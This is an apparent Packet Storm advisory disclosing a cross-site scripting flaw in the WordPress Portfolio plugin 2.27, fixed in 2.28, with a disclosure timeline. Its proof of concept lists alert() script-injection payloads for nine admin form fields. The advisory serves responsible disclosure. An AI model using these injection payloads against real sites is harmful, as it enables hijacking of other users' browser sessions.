WordPress Portfolio 2.27 Cross Site Scripting

Type packetstorm
Reporter Madhu Akula
Modified 2015-12-17T00:00:00


                                            `Plugin Name : Portfolio  
Effected Version : 2.27 (and most probably lower version's if any)  
Vulnerability : A3-Cross-Site Scripting (XSS)  
Identified by : Madhu Akula  
Technical Details  
Minimum Level of Access Required : Administrator  
PoC - (Proof of Concept) :  
The following fields put the payload as below  
tag-slug = “><script>alert(1)</script>  
prtfl_date_text_field = “><script>alert(2)</script>  
prtfl_link_text_field = “><script>alert(3)</script>  
prtfl_shrdescription_text_field = “><script>alert(4)</script>  
prtfl_description_text_field = “><script>alert(5)</script>  
prtfl_svn_text_field = “><script>alert(6)</script>  
prtfl_executor_text_field = “><script>alert(7)</script>  
prtfl_screenshot_text_field = “><script>alert(8)</script>  
prtfl_technologies_text_field = “><script>alert(9)</script>  
Vulnerable Parameter : tag-slug, prtfl_date_text_field, prtfl_link_text_field, prtfl_shrdescription_text_field, prtfl_description_text_field, prtfl_svn_text_field, prtfl_executor_text_field, prtfl_screenshot_text_field, prtfl_technologies_text_field  
Type of XSS : Reflected / Stored  
Fixed in : 2.28  
Disclosure Timeline  
Vendor Contacted : 2014-08-04  
Plugin Status : Updated on 2014-08-07  
Public Disclosure : October 3, 2015  
CVE Number : Not assigned yet  
Plugin Description :  
With the Portfolio plugin you can create a unique page for displaying portfolio items consisting of screenshots and additional information such as description, short description, URL, date of completion, etc. Moreover you can add not just one, but many screenshots to one portfolio item for better visual guidance.